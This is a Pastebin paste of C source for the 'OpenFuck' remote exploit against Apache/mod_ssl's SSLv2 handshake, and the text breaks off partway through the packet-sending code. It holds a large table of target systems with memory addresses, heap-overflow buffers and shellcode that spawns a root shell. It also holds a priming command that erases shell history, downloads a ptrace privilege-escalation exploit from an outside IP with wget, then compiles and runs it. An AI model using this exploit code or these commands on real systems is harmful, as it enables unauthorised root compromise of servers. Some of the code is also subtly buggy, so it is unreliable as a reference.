Advertisement
Guest User

Untitled

a guest
Feb 19th, 2019
308
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 33.33 KB | None | 0 0
  1. /*
  2. * Seccessful complie on Kali-Linux-2018.4-vm-amd64
  3. * E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
  4. *
  5. * OF version r00t VERY PRIV8 spabam
  6. * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
  7. * objdump -R /usr/sbin/httpd|grep free to get more targets
  8. * #hackarena irc.brasnet.org
  9. */
  10.  
  11. #include <arpa/inet.h>
  12. #include <netinet/in.h>
  13. #include <sys/types.h>
  14. #include <sys/socket.h>
  15. #include <netdb.h>
  16. #include <errno.h>
  17. #include <string.h>
  18. #include <stdio.h>
  19. #include <unistd.h>
  20.  
  21. #include <openssl/ssl.h>
  22. #include <openssl/rsa.h>
  23. #include <openssl/x509.h>
  24. #include <openssl/evp.h>
  25. #include <openssl/rc4.h>
  26. #include <openssl/md5.h>
  27.  
  28. #define SSL2_MT_ERROR 0
  29. #define SSL2_MT_CLIENT_FINISHED 3
  30. #define SSL2_MT_SERVER_HELLO 4
  31. #define SSL2_MT_SERVER_VERIFY 5
  32. #define SSL2_MT_SERVER_FINISHED 6
  33. #define SSL2_MAX_CONNECTION_ID_LENGTH 16
  34.  
  35. /* update this if you add architectures */
  36. #define MAX_ARCH 138
  37.  
  38. struct archs {
  39. char* desc;
  40. int func_addr; /* objdump -R /usr/sbin/httpd | grep free */
  41. } architectures[] = {
  42.  
  43. {
  44. "Caldera OpenLinux (apache-1.3.26)",
  45. 0x080920e0
  46. },
  47. {
  48. "Cobalt Sun 6.0 (apache-1.3.12)",
  49. 0x8120f0c
  50. },
  51. {
  52. "Cobalt Sun 6.0 (apache-1.3.20)",
  53. 0x811dcb8
  54. },
  55. {
  56. "Cobalt Sun x (apache-1.3.26)",
  57. 0x8123ac3
  58. },
  59. {
  60. "Cobalt Sun x Fixed2 (apache-1.3.26)",
  61. 0x81233c3
  62. },
  63. {
  64. "Conectiva 4 (apache-1.3.6)",
  65. 0x08075398
  66. },
  67. {
  68. "Conectiva 4.1 (apache-1.3.9)",
  69. 0x0808f2fe
  70. },
  71. {
  72. "Conectiva 6 (apache-1.3.14)",
  73. 0x0809222c
  74. },
  75. {
  76. "Conectiva 7 (apache-1.3.12)",
  77. 0x0808f874
  78. },
  79. {
  80. "Conectiva 7 (apache-1.3.19)",
  81. 0x08088aa0
  82. },
  83. {
  84. "Conectiva 7/8 (apache-1.3.26)",
  85. 0x0808e628
  86. },
  87. {
  88. "Conectiva 8 (apache-1.3.22)",
  89. 0x0808b2d0
  90. },
  91. {
  92. "Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)",
  93. 0x08095264
  94. },
  95. {
  96. "Debian GNU Linux (apache_1.3.19-1)",
  97. 0x080966fc
  98. },
  99. {
  100. "Debian GNU Linux (apache_1.3.22-2)",
  101. 0x08096aac
  102. },
  103. {
  104. "Debian GNU Linux (apache-1.3.22-2.1)",
  105. 0x08083828
  106. },
  107. {
  108. "Debian GNU Linux (apache-1.3.22-5)",
  109. 0x08083728
  110. },
  111. {
  112. "Debian GNU Linux (apache_1.3.23-1)",
  113. 0x08085de8
  114. },
  115. {
  116. "Debian GNU Linux (apache_1.3.24-2.1)",
  117. 0x08087d08
  118. },
  119. { "Debian Linux GNU Linux 2 (apache_1.3.24-2.1)",
  120. 0x080873ac
  121. },
  122. {
  123. "Debian GNU Linux (apache_1.3.24-3)",
  124. 0x08087d68
  125. },
  126. {
  127. "Debian GNU Linux (apache-1.3.26-1)",
  128. 0x0080863c4
  129. },
  130. {
  131. "Debian GNU Linux 3.0 Woody (apache-1.3.26-1)",
  132. 0x080863cc
  133. },
  134. { "Debian GNU Linux (apache-1.3.27)",
  135. 0x0080866a3
  136. },
  137.  
  138.  
  139. { "FreeBSD (apache-1.3.9)", 0xbfbfde00 },
  140. { "FreeBSD (apache-1.3.11)", 0x080a2ea8 },
  141. { "FreeBSD (apache-1.3.12.1.40)", 0x080a7f58 },
  142. { "FreeBSD (apache-1.3.12.1.40)", 0x080a0ec0 },
  143. { "FreeBSD (apache-1.3.12.1.40)", 0x080a7e7c },
  144. { "FreeBSD (apache-1.3.12.1.40_1)", 0x080a7f18 },
  145. { "FreeBSD (apache-1.3.12)", 0x0809bd7c },
  146. { "FreeBSD (apache-1.3.14)", 0xbfbfdc00 },
  147. { "FreeBSD (apache-1.3.14)", 0x080ab68c },
  148. { "FreeBSD (apache-1.3.14)", 0x0808c76c },
  149. { "FreeBSD (apache-1.3.14)", 0x080a3fc8 },
  150. { "FreeBSD (apache-1.3.14)", 0x080ab6d8 },
  151. { "FreeBSD (apache-1.3.17_1)", 0x0808820c },
  152. { "FreeBSD (apache-1.3.19)", 0xbfbfdc00 },
  153. { "FreeBSD (apache-1.3.19_1)", 0x0808c96c },
  154. { "FreeBSD (apache-1.3.20)", 0x0808cb70 },
  155. { "FreeBSD (apache-1.3.20)", 0xbfbfc000 },
  156. { "FreeBSD (apache-1.3.20+2.8.4)", 0x0808faf8 },
  157. { "FreeBSD (apache-1.3.20_1)", 0x0808dfb4 },
  158. { "FreeBSD (apache-1.3.22)", 0xbfbfc000 },
  159. { "FreeBSD (apache-1.3.22_7)", 0x0808d110 },
  160. { "FreeBSD (apache_fp-1.3.23)", 0x0807c5f8 },
  161. { "FreeBSD (apache-1.3.24_7)", 0x0808f8b0 },
  162. { "FreeBSD (apache-1.3.24+2.8.8)", 0x080927f8 },
  163. { "FreeBSD 4.6.2-Release-p6 (apache-1.3.26)", 0x080c432c },
  164. { "FreeBSD 4.6-Realease (apache-1.3.26)", 0x0808fdec },
  165. { "FreeBSD (apache-1.3.27)", 0x080902e4 },
  166.  
  167.  
  168. {
  169. "Gentoo Linux (apache-1.3.24-r2)",
  170. 0x08086c34
  171. },
  172. {
  173. "Linux Generic (apache-1.3.14)",
  174. 0xbffff500
  175. },
  176. {
  177. "Mandrake Linux X.x (apache-1.3.22-10.1mdk)",
  178. 0x080808ab
  179. },
  180. {
  181. "Mandrake Linux 7.1 (apache-1.3.14-2)",
  182. 0x0809f6c4
  183. },
  184. {
  185. "Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)",
  186. 0x0809d233
  187. },
  188. {
  189. "Mandrake Linux 7.2 (apache-1.3.14-2mdk)",
  190. 0x0809f6ef
  191. },
  192. {
  193. "Mandrake Linux 7.2 (apache-1.3.14) 2",
  194. 0x0809d6c4
  195. },
  196. {
  197. "Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)",
  198. 0x0809ccde
  199. },
  200. {
  201. "Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)",
  202. 0x0809ce14
  203. },
  204. {
  205. "Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)",
  206. 0x0809d262
  207. },
  208. {
  209. "Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)",
  210. 0x08083545
  211. },
  212. {
  213. "Mandrake Linux 8.0 (apache-1.3.19-3)",
  214. 0x0809ea98
  215. },
  216. {
  217. "Mandrake Linux 8.1 (apache-1.3.20-3)",
  218. 0x0809e97c
  219. },
  220. {
  221. "Mandrake Linux 8.2 (apache-1.3.23-4)",
  222. 0x08086580
  223. },
  224. { "Mandrake Linux 8.2 #2 (apache-1.3.23-4)",
  225. 0x08086484
  226. },
  227. { "Mandrake Linux 8.2 (apache-1.3.24)",
  228. 0x08086665
  229. },
  230.  
  231. { "Mandrake Linux 9 (apache-1.3.26)",
  232. 0x0808b864
  233. },
  234. {
  235. "RedHat Linux ?.? GENERIC (apache-1.3.12-1)",
  236. 0x0808c0f4
  237. },
  238. {
  239. "RedHat Linux TEST1 (apache-1.3.12-1)",
  240. 0x0808c0f4
  241. },
  242. {
  243. "RedHat Linux TEST2 (apache-1.3.12-1)",
  244. 0x0808c0f4
  245. },
  246. {
  247. "RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)",
  248. 0x080d2c35
  249. },
  250. {
  251. "RedHat Linux 4.2 (apache-1.1.3-3)",
  252. 0x08065bae
  253. },
  254. {
  255. "RedHat Linux 5.0 (apache-1.2.4-4)",
  256. 0x0808c82c
  257. },
  258. {
  259. "RedHat Linux 5.1-Update (apache-1.2.6)",
  260. 0x08092a45
  261. },
  262. {
  263. "RedHat Linux 5.1 (apache-1.2.6-4)",
  264. 0x08092c2d
  265. },
  266. {
  267. "RedHat Linux 5.2 (apache-1.3.3-1)",
  268. 0x0806f049
  269. },
  270. {
  271. "RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)",
  272. 0x0808e4d8
  273. },
  274. {
  275. "RedHat Linux 6.0 (apache-1.3.6-7)",
  276. 0x080707ec
  277. },
  278. {
  279. "RedHat Linux 6.0 (apache-1.3.6-7)",
  280. 0x080707f9
  281. },
  282. {
  283. "RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)",
  284. 0x0808fd52
  285. },
  286. {
  287. "RedHat Linux 6.0 Update (apache-1.3.24)",
  288. 0x80acd58
  289. },
  290. {
  291. "RedHat Linux 6.1 (apache-1.3.9-4)1",
  292. 0x0808ccc4
  293. },
  294. {
  295. "RedHat Linux 6.1 (apache-1.3.9-4)2",
  296. 0x0808ccdc
  297. },
  298. {
  299. "RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)",
  300. 0x0808fd5d
  301. },
  302. {
  303. "RedHat Linux 6.1-fp2000 (apache-1.3.26)",
  304. 0x082e6fcd
  305. },
  306. {
  307. "RedHat Linux 6.2 (apache-1.3.12-2)1",
  308. 0x0808f689
  309. },
  310. {
  311. "RedHat Linux 6.2 (apache-1.3.12-2)2",
  312. 0x0808f614
  313. },
  314. {
  315. "RedHat Linux 6.2 mod(apache-1.3.12-2)3",
  316. 0xbffff94c
  317. },
  318.  
  319. {
  320. "RedHat Linux 6.2 update (apache-1.3.22-5.6)1",
  321. 0x0808f9ec
  322. },
  323. {
  324. "RedHat Linux 6.2-Update (apache-1.3.22-5.6)2",
  325. 0x0808f9d4
  326. },
  327. {
  328. "Redhat Linux 7.x (apache-1.3.22)",
  329. 0x0808400c
  330. },
  331. {
  332. "RedHat Linux 7.x (apache-1.3.26-1)",
  333. 0x080873bc
  334. },
  335. { "RedHat Linux 7.x (apache-1.3.27)",
  336. 0x08087221
  337. },
  338. {
  339. "RedHat Linux 7.0 (apache-1.3.12-25)1",
  340. 0x0809251c
  341. },
  342. {
  343. "RedHat Linux 7.0 (apache-1.3.12-25)2",
  344. 0x0809252d
  345. },
  346. {
  347. "RedHat Linux 7.0 (apache-1.3.14-2)",
  348. 0x08092b98
  349. },
  350. {
  351. "RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)",
  352. 0x08084358
  353. },
  354. {
  355. "RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)",
  356. 0x0808438c
  357. },
  358. {
  359. "RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)",
  360. 0x08086e41
  361. },
  362. {
  363. "RedHat Linux 7.1 (apache-1.3.19-5)1",
  364. 0x0809af8c
  365. },
  366. {
  367. "RedHat Linux 7.1 (apache-1.3.19-5)2",
  368. 0x0809afd9
  369. },
  370. {
  371. "RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)",
  372. 0x0808438c
  373. },
  374. {
  375. "RedHat Linux 7.1-Update (1.3.22-5.7.1)",
  376. 0x08084389
  377. },
  378. {
  379. "RedHat Linux 7.1 (apache-1.3.22-src)",
  380. 0x0816021c
  381. },
  382. {
  383. "RedHat Linux 7.1-Update (1.3.27-1.7.1)",
  384. 0x08086ec89
  385. },
  386. {
  387. "RedHat Linux 7.2 (apache-1.3.20-16)1",
  388. 0x080994e5
  389. },
  390. {
  391. "RedHat Linux 7.2 (apache-1.3.20-16)2",
  392. 0x080994d4
  393. },
  394. {
  395. "RedHat Linux 7.2-Update (apache-1.3.22-6)",
  396. 0x08084045
  397. },
  398. {
  399. "RedHat Linux 7.2 (apache-1.3.24)",
  400. 0x80b0938
  401. },
  402. {
  403. "RedHat Linux 7.2 (apache-1.3.26)",
  404. 0x08161c16
  405. },
  406. {
  407. "RedHat Linux 7.2 (apache-1.3.26-snc)",
  408. 0x8161c14
  409. },
  410. {
  411.  
  412. "Redhat Linux 7.2 (apache-1.3.26 w/PHP)1",
  413. 0x08269950
  414. },
  415. {
  416. "Redhat Linux 7.2 (apache-1.3.26 w/PHP)2",
  417. 0x08269988
  418. },
  419. {
  420. "RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)",
  421. 0x08086af9
  422. },
  423. {
  424. "RedHat Linux 7.3 (apache-1.3.23-11)1",
  425. 0x0808528c
  426. },
  427. {
  428. "RedHat Linux 7.3 (apache-1.3.23-11)2",
  429. 0x0808525f
  430. },
  431. {
  432. "RedHat Linux 7.3 (apache-1.3.27)",
  433. 0x080862e4
  434. },
  435. { "RedHat Linux 8.0 (apache-1.3.27)",
  436. 0x08084c1c
  437. },
  438. { "RedHat Linux 8.0-second (apache-1.3.27)",
  439. 0x0808151e
  440. },
  441. { "RedHat Linux 8.0 (apache-2.0.40)",
  442. 0x08092fa4
  443. },
  444. {
  445. "Slackware Linux 4.0 (apache-1.3.6)",
  446. 0x08088130
  447. },
  448. {
  449. "Slackware Linux 7.0 (apache-1.3.9)",
  450. 0x080a7fc0
  451. },
  452. {
  453. "Slackware Linux 7.0 (apache-1.3.26)",
  454. 0x083d37fc
  455. },
  456. { "Slackware 7.0 (apache-1.3.26)2",
  457. 0x083d2232
  458. },
  459. {
  460. "Slackware Linux 7.1 (apache-1.3.12)",
  461. 0x080a86a4
  462. },
  463. {
  464. "Slackware Linux 8.0 (apache-1.3.20)",
  465. 0x080ae67c
  466. },
  467. {
  468. "Slackware Linux 8.1 (apache-1.3.24)",
  469. 0x080b0c60
  470. },
  471. {
  472. "Slackware Linux 8.1 (apache-1.3.26)",
  473. 0x080b2100
  474. },
  475.  
  476. {
  477. "Slackware Linux 8.1-stable (apache-1.3.26)",
  478. 0x080b0c60
  479. },
  480. { "Slackware Linux (apache-1.3.27)",
  481. 0x080b1a3a
  482. },
  483. {
  484. "SuSE Linux 7.0 (apache-1.3.12)",
  485. 0x0809f54c
  486. },
  487. {
  488. "SuSE Linux 7.1 (apache-1.3.17)",
  489. 0x08099984
  490. },
  491. {
  492. "SuSE Linux 7.2 (apache-1.3.19)",
  493. 0x08099ec8
  494. },
  495. {
  496. "SuSE Linux 7.3 (apache-1.3.20)",
  497. 0x08099da8
  498. },
  499. {
  500. "SuSE Linux 8.0 (apache-1.3.23)",
  501. 0x08086168
  502. },
  503. {
  504. "SUSE Linux 8.0 (apache-1.3.23-120)",
  505. 0x080861c8
  506. },
  507. {
  508. "SuSE Linux 8.0 (apache-1.3.23-137)",
  509. 0x080861c8
  510. },
  511. /* this one unchecked cause require differend shellcode */
  512. {
  513. "Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)",
  514. 0xfd42630
  515. },
  516.  
  517. };
  518.  
  519. extern int errno;
  520.  
  521. int cipher;
  522. int ciphers;
  523.  
  524. /* the offset of the local port from be beginning of the overwrite next chunk buffer */
  525. #define FINDSCKPORTOFS 208 + 12 + 46
  526.  
  527. unsigned char overwrite_session_id_length[] =
  528. "AAAA" /* int master key length; */
  529. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */
  530. "\x70\x00\x00\x00"; /* unsigned int session id length; */
  531.  
  532. unsigned char overwrite_next_chunk[] =
  533. "AAAA" /* int master key length; */
  534. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */
  535. "AAAA" /* unsigned int session id length; */
  536. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char session id[SSL MAX SSL SESSION ID LENGTH]; */
  537. "AAAA" /* unsigned int sid ctx length; */
  538. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid ctx[SSL MAX SID CTX LENGTH]; */
  539. "AAAA" /* int not resumable; */
  540. "\x00\x00\x00\x00" /* struct sess cert st *sess cert; */
  541. "\x00\x00\x00\x00" /* X509 *peer; */
  542. "AAAA" /* long verify result; */
  543. "\x01\x00\x00\x00" /* int references; */
  544. "AAAA" /* int timeout; */
  545. "AAAA" /* int time */
  546. "AAAA" /* int compress meth; */
  547. "\x00\x00\x00\x00" /* SSL CIPHER *cipher; */
  548. "AAAA" /* unsigned long cipher id; */
  549. "\x00\x00\x00\x00" /* STACK OF(SSL CIPHER) *ciphers; */
  550. "\x00\x00\x00\x00\x00\x00\x00\x00" /* CRYPTO EX DATA ex data; */
  551. "AAAAAAAA" /* struct ssl session st *prev,*next; */
  552.  
  553. "\x00\x00\x00\x00" /* Size of previous chunk */
  554. "\x11\x00\x00\x00" /* Size of chunk, in bytes */
  555. "fdfd" /* Forward and back pointers */
  556. "bkbk"
  557. "\x10\x00\x00\x00" /* Size of previous chunk */
  558. "\x10\x00\x00\x00" /* Size of chunk, PREV INUSE is set */
  559.  
  560. /* shellcode start */
  561. "\xeb\x0a\x90\x90" /* jump 10 bytes ahead, land at shellcode */
  562. "\x90\x90\x90\x90"
  563. "\x90\x90\x90\x90" /* this is overwritten with FD by the unlink macro */
  564.  
  565. /* 72 bytes findsckcode by LSD-pl */
  566. "\x31\xdb" /* xorl %ebx,%ebx */
  567. "\x89\xe7" /* movl %esp,%edi */
  568. "\x8d\x77\x10" /* leal 0x10(%edi),%esi */
  569. "\x89\x77\x04" /* movl %esi,0x4(%edi) */
  570. "\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */
  571. "\x89\x4f\x08" /* movl %ecx,0x8(%edi) */
  572. "\xb3\x10" /* movb $0x10,%bl */
  573. "\x89\x19" /* movl %ebx,(%ecx) */
  574. "\x31\xc9" /* xorl %ecx,%ecx */
  575. "\xb1\xff" /* movb $0xff,%cl */
  576. "\x89\x0f" /* movl %ecx,(%edi) */
  577. "\x51" /* pushl %ecx */
  578. "\x31\xc0" /* xorl %eax,%eax */
  579. "\xb0\x66" /* movb $0x66,%al */
  580. "\xb3\x07" /* movb $0x07,%bl */
  581. "\x89\xf9" /* movl %edi,%ecx */
  582. "\xcd\x80" /* int $0x80 */
  583. "\x59" /* popl %ecx */
  584. "\x31\xdb" /* xorl %ebx,%ebx */
  585. "\x39\xd8" /* cmpl %ebx,%eax */
  586. "\x75\x0a" /* jne <findsckcode+54> */
  587. "\x66\xb8\x12\x34" /* movw $0x1234,%bx */
  588. "\x66\x39\x46\x02" /* cmpw %bx,0x2(%esi) */
  589. "\x74\x02" /* je <findsckcode+56> */
  590. "\xe2\xe0" /* loop <findsckcode+24> */
  591. "\x89\xcb" /* movl %ecx,%ebx */
  592. "\x31\xc9" /* xorl %ecx,%ecx */
  593. "\xb1\x03" /* movb $0x03,%cl */
  594. "\x31\xc0" /* xorl %eax,%eax */
  595. "\xb0\x3f" /* movb $0x3f,%al */
  596. "\x49" /* decl %ecx */
  597. "\xcd\x80" /* int $0x80 */
  598. "\x41" /* incl %ecx */
  599. "\xe2\xf6" /* loop <findsckcode+62> */
  600.  
  601. /* 10 byte setresuid(0,0,0); by core */
  602. "\x31\xc9" /* xor %ecx,%ecx */
  603. "\xf7\xe1" /* mul %ecx,%eax */
  604. "\x51" /* push %ecx */
  605. "\x5b" /* pop %ebx */
  606. "\xb0\xa4" /* mov $0xa4,%al */
  607. "\xcd\x80" /* int $0x80 */
  608.  
  609.  
  610. /* bigger shellcode added by spabam */
  611.  
  612. /* "\xB8\x2F\x73\x68\x23\x25\x2F\x73\x68\xDC\x50\x68\x2F\x62\x69"
  613. "\x6E\x89\xE3\x31\xC0\x50\x53\x89\xE1\x04\x0B\x31\xD2\xCD\x80"
  614. */
  615.  
  616.  
  617. /* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */
  618. "\x31\xc0" /* xorl %eax,%eax */
  619. "\x50" /* pushl %eax */
  620. "\x68""//sh" /* pushl $0x68732f2f */
  621. "\x68""/bin" /* pushl $0x6e69622f */
  622. "\x89\xe3" /* movl %esp,%ebx */
  623. "\x50" /* pushl %eax */
  624. "\x53" /* pushl %ebx */
  625. "\x89\xe1" /* movl %esp,%ecx */
  626. "\x99" /* cdql */
  627. "\xb0\x0b" /* movb $0x0b,%al */
  628. "\xcd\x80"; /* int $0x80 */
  629.  
  630. /* read and write buffer*/
  631. #define BUFSIZE 16384
  632.  
  633. /* hardcoded protocol stuff */
  634. #define CHALLENGE_LENGTH 16
  635. #define RC4_KEY_LENGTH 16 /* 128 bits */
  636. #define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2)
  637.  
  638. /* straight from the openssl source */
  639. #define n2s(c,s) ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1])) )),c+=2)
  640. #define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s) )&0xff)),c+=2)
  641.  
  642. /* we keep all SSL2 state in this structure */
  643. typedef struct {
  644. int sock;
  645.  
  646. /* client stuff */
  647. unsigned char challenge[CHALLENGE_LENGTH];
  648. unsigned char master_key[RC4_KEY_LENGTH];
  649. unsigned char key_material[RC4_KEY_MATERIAL_LENGTH];
  650.  
  651. /* connection id - returned by the server */
  652. int conn_id_length;
  653. unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
  654.  
  655. /* server certificate */
  656. X509 *x509;
  657.  
  658. /* session keys */
  659. unsigned char* read_key;
  660. unsigned char* write_key;
  661. RC4_KEY* rc4_read_key;
  662. RC4_KEY* rc4_write_key;
  663.  
  664. /* sequence numbers, used for MAC calculation */
  665. int read_seq;
  666. int write_seq;
  667.  
  668. /* set to 1 when the SSL2 handshake is complete */
  669. int encrypted;
  670. } ssl_conn;
  671.  
  672. #define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n"
  673. #define COMMAND2 "unset HISTFILE; cd /tmp; wget http://172.16.1.136:8000/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
  674.  
  675. long getip(char *hostname) {
  676. struct hostent *he;
  677. long ipaddr;
  678.  
  679. if ((ipaddr = inet_addr(hostname)) < 0) {
  680. if ((he = gethostbyname(hostname)) == NULL) {
  681. perror("gethostbyname()");
  682. exit(-1);
  683. }
  684. memcpy(&ipaddr, he->h_addr, he->h_length);
  685. }
  686. return ipaddr;
  687. }
  688.  
  689. /* mixter's code w/enhancements by core */
  690.  
  691. int sh(int sockfd) {
  692. char snd[1024], rcv[1024];
  693. fd_set rset;
  694. int maxfd, n;
  695.  
  696. /* Priming commands */
  697. strcpy(snd, COMMAND1 "\n");
  698. write(sockfd, snd, strlen(snd));
  699.  
  700. strcpy(snd, COMMAND2 "\n");
  701. write(sockfd, snd, strlen(snd));
  702.  
  703. /* Main command loop */
  704. for (;;) {
  705. FD_SET(fileno(stdin), &rset);
  706. FD_SET(sockfd, &rset);
  707.  
  708. maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
  709. select(maxfd, &rset, NULL, NULL, NULL);
  710.  
  711. if (FD_ISSET(fileno(stdin), &rset)) {
  712. bzero(snd, sizeof(snd));
  713. fgets(snd, sizeof(snd)-2, stdin);
  714. write(sockfd, snd, strlen(snd));
  715. }
  716.  
  717. if (FD_ISSET(sockfd, &rset)) {
  718. bzero(rcv, sizeof(rcv));
  719.  
  720. if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {
  721. printf("Good Bye!\n");
  722. return 0;
  723. }
  724.  
  725. if (n < 0) {
  726. perror("read");
  727. return 1;
  728. }
  729.  
  730. fputs(rcv, stdout);
  731. fflush(stdout); /* keeps output nice */
  732. }
  733. } /* for(;;) */
  734. }
  735.  
  736. /* Returns the local port of a connected socket */
  737. int get_local_port(int sock)
  738. {
  739. struct sockaddr_in s_in;
  740. unsigned int namelen = sizeof(s_in);
  741.  
  742. if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) {
  743. printf("Can't get local port: %s\n", strerror(errno));
  744. exit(1);
  745. }
  746.  
  747. return s_in.sin_port;
  748. }
  749.  
  750. /* Connect to a host */
  751. int connect_host(char* host, int port)
  752. {
  753. struct sockaddr_in s_in;
  754. int sock;
  755.  
  756. s_in.sin_family = AF_INET;
  757. s_in.sin_addr.s_addr = getip(host);
  758. s_in.sin_port = htons(port);
  759.  
  760. if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) {
  761. printf("Could not create a socket\n");
  762. exit(1);
  763. }
  764.  
  765. if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) {
  766. printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno));
  767. exit(1);
  768. }
  769.  
  770. return sock;
  771. }
  772.  
  773. /* Create a new ssl conn structure and connect to a host */
  774. ssl_conn* ssl_connect_host(char* host, int port)
  775. {
  776. ssl_conn* ssl;
  777.  
  778. if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) {
  779. printf("Can't allocate memory\n");
  780. exit(1);
  781. }
  782.  
  783. /* Initialize some values */
  784. ssl->encrypted = 0;
  785. ssl->write_seq = 0;
  786. ssl->read_seq = 0;
  787.  
  788. ssl->sock = connect_host(host, port);
  789.  
  790. return ssl;
  791. }
  792.  
  793. /* global buffer used by the ssl result() */
  794. char res_buf[30];
  795.  
  796. /* converts an SSL error code to a string */
  797. char* ssl_error(int code) {
  798. switch (code) {
  799. case 0x00: return "SSL2 PE UNDEFINED ERROR (0x00)";
  800. case 0x01: return "SSL2 PE NO CIPHER (0x01)";
  801. case 0x02: return "SSL2 PE NO CERTIFICATE (0x02)";
  802. case 0x04: return "SSL2 PE BAD CERTIFICATE (0x03)";
  803. case 0x06: return "SSL2 PE UNSUPPORTED CERTIFICATE TYPE (0x06)";
  804. default:
  805. sprintf(res_buf, "%02x", code);
  806. return res_buf;
  807. }
  808. }
  809.  
  810. /* read len bytes from a socket. boring. */
  811. int read_data(int sock, unsigned char* buf, int len)
  812. {
  813. int l;
  814. int to_read = len;
  815.  
  816. do {
  817. if ((l = read(sock, buf, to_read)) < 0) {
  818. printf("Error in read: %s\n", strerror(errno));
  819. exit(1);
  820. }
  821. to_read -= len;
  822. } while (to_read > 0);
  823.  
  824. return len;
  825. }
  826.  
  827. /* reads an SSL packet and decrypts it if necessery */
  828. int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size)
  829. {
  830. int rec_len, padding;
  831.  
  832. read_data(ssl->sock, buf, 2);
  833.  
  834. if ((buf[0] & 0x80) == 0) {
  835. /* three byte header */
  836. rec_len = ((buf[0] & 0x3f) << 8) | buf[1];
  837. read_data(ssl->sock, &buf[2], 1);
  838. padding = (int)buf[2];
  839. }
  840. else {
  841. /* two byte header */
  842. rec_len = ((buf[0] & 0x7f) << 8) | buf[1];
  843. padding = 0;
  844. }
  845.  
  846. if ((rec_len <= 0) || (rec_len > buf_size)) {
  847. printf("read_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len);
  848. exit(1);
  849. }
  850.  
  851. read_data(ssl->sock, buf, rec_len);
  852.  
  853. if (ssl->encrypted) {
  854. if (MD5_DIGEST_LENGTH + padding >= rec_len) {
  855. if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
  856. /* the server didn't switch to encryption due to an error */
  857. return 0;
  858. }
  859. else {
  860. printf("read_ssl_packet: Encrypted message is too short (rec_len = %d)\n", rec_len);
  861. exit(1);
  862. }
  863. }
  864.  
  865. /* decrypt the encrypted part of the packet */
  866. RC4(ssl->rc4_read_key, rec_len, buf, buf);
  867.  
  868. /* move the decrypted message in the beginning of the buffer */
  869. rec_len = rec_len - MD5_DIGEST_LENGTH - padding;
  870. memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len);
  871. }
  872.  
  873. if (buf[0] == SSL2_MT_ERROR) {
  874. if (rec_len != 3) {
  875. printf("Malformed server error message\n");
  876. exit(1);
  877. }
  878. else {
  879. return 0;
  880. }
  881. }
  882.  
  883. return rec_len;
  884. }
  885.  
  886. /* send an ssl packet, encrypting it if ssl->encrypted is set */
  887. void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len)
  888. {
  889. unsigned char buf[BUFSIZE];
  890. unsigned char* p;
  891. int tot_len;
  892. MD5_CTX ctx;
  893. int seq;
  894.  
  895.  
  896. if (ssl->encrypted)
  897. tot_len = rec_len + MD5_DIGEST_LENGTH; /* RC4 needs no padding */
  898. else
  899. tot_len = rec_len;
  900.  
  901. if (2 + tot_len > BUFSIZE) {
  902. printf("send_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len);
  903. exit(1);
  904. }
  905.  
  906. p = buf;
  907. s2n(tot_len, p);
  908.  
  909. buf[0] = buf[0] | 0x80; /* two byte header */
  910.  
  911. if (ssl->encrypted) {
  912. /* calculate the MAC */
  913. seq = ntohl(ssl->write_seq);
  914.  
  915. MD5_Init(&ctx);
  916. MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
  917. MD5_Update(&ctx, rec, rec_len);
  918. MD5_Update(&ctx, &seq, 4);
  919. MD5_Final(p, &ctx);
  920.  
  921. p+=MD5_DIGEST_LENGTH;
  922.  
  923. memcpy(p, rec, rec_len);
  924.  
  925. /* encrypt the payload */
  926. RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
  927.  
  928. }
  929. else {
  930. memcpy(p, rec, rec_len);
  931. }
  932.  
  933. send(ssl->sock, buf, 2 + tot_len, 0);
  934.  
